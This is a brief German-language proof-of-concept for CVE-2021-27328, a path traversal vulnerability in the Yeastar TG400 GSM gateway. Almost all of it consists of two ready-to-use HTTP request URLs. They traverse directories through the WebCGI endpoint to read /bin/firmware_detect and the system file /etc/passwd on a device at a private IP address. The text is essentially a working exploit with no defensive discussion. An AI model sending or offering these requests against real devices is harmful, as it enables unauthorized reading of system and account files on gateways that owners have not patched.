
Proof-of-Concept-Exploit für CVE-2021-27328, eine Path-Traversal-Sicherheitslücke im Yeastar TG400 GSM Gateway, die das beliebige Lesen von Dateien über eine manipulierte HTTP-Anfrage an den WebCGI-Endpunkt demonstriert.
Dies ist ein Proof of Concept für CVE-2021-27328
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect

http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd
